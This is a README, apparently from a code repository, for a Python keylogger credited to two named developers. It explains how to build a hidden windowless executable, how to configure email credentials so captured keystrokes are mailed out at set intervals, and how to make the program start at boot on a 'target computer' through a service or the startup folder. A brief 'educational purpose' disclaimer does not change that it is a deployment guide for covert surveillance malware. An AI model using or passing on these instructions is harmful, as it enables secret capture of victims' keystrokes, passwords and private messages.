Keylooger made in python3.
This is for educational purpose! Do not use this in any wrong way. I won't be responsible for any of your wrong work.
- get pyinstaller
- install requirements with
$ pip install -r requirements.txt
- In
config.json
you need to provide email and passowrd which you wanna use. (if you're using Gmail then follow NOTE) - in config file
"MAIL_EVERY"
value takes integer which follows minutes. (eg."MAIL_EVERY": 60
will send mail after every 60minutes)
NOTE: You may need to enable allowing Less Secure apps from your google account.
$ pyinstaller main.py -w
You can either setup a service to run the exe in target computer or put it inside startup folder for on-boot execution.
@MalavVyas - For creating this keylogger
@SwapnilSoni1999 - For adding extra functionality